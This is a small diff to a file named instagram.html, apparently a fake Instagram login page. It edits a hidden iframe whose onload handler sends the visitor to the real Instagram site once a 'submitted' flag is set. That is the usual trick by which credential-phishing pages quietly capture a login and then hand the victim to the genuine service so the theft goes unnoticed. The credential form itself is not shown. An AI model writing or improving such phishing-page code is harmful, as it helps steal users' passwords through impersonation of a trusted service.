--- a/instagram.html
+++ b/instagram.html
@@ -8,7 +8,7 @@
 </head>
 <body>
 <script type="text/javascript">var submitted=false;</script>
-<iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='https://www.instagram.com/ennaqimi/';}"></iframe>
+<iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='https://www.instagram.com';}"></iframe>
 <div class="wrapper">
 	<div class="header">
 		<div class="top">
